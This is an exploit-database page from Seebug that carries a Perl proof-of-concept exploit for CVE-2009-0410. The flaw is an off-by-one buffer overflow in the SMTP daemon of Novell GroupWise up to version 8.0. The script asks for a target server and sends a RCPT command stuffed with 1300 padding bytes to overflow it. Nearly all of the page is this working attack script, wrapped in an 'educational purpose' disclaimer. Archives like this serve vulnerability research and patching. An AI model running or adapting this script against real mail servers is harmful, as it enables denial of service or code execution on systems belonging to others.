Lucene search

K
seebugRootSSV:66279
HistoryJul 01, 2014 - 12:00 a.m.

Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit

2014-07-0100:00:00
Root
www.seebug.org
10

0.919 High

EPSS

Percentile

98.7%

No description provided by source.


                                                #!usr/bin/perl -w

#######################################################################################
###############################QUICK AND DIRTY EXPLOIT#################################
#######################################################################################
#   Off-by-one error in the SMTP daemon in GroupWise Internet Agent (GWIA)
#    in Novell GroupWise 6.5x, 7.0, 7.01, 7.02, 7.03, 7.03HP1a, and 8.0 allows
#    remote attackers to execute arbitrary code via a long e-mail address in a
#    malformed RCPT command, leading to a buffer overflow.
#    Refer:
#    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0410
#
#    To run this exploit on MS Windows replace &#34;#!usr/bin/perl -w&#34; with
#     &#34;#!Installation_path_for_perl -w&#34; (say #!C:/Program Files/Perl/bin/perl -w)
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
#        Author:    Praveen Darshanam
#        Email:     praveen[underscore]recker[at]sify.com\
#         Blog:        http://www.darshanams.blogspot.com/
#        Date:      04th February, 2009
#
########Thanx to str0ke, milw0rm, @rp m@n, an all the security folks####################
########################################################################################


use Net::SMTP;
print &#34;***SMTP module is working fine***\n&#34;;


$buff=&#34;D&#34; x 1300;
print &#34;Enter Vulnerable Novell GroupWise SMTP Server Domain Name\n&#34;;
$smtp_vuln_server_name=&#60;STDIN&#62;;
chop($smtp_vuln_server_name);

$smtp_attack=Net::SMTP-&#62;new(&#34;$smtp_vuln_server_name&#34;);
print&#34;\nEnter your/from mail ID here\n&#34;;
$$mail_from=&#60;STDIN&#62;;
chop($mail_from);


print&#34;\nEnter Recepient mail ID\n&#34;;
$to_mail_id=&#60;STDIN&#62;;
chop($to_mail_id);

$mal_buffer=$buff.$to_mail_id;

$smtp_attack-&#62;mail($mail_from);
$smtp_attack-&#62;to($mal_buffer);

$smtp_attack-&#62;data();
$smtp_attack-&#62;datasend(&#34;Attacking...&#34;);

$smtp_attack-&#62;quit();

# milw0rm.com [2009-02-04]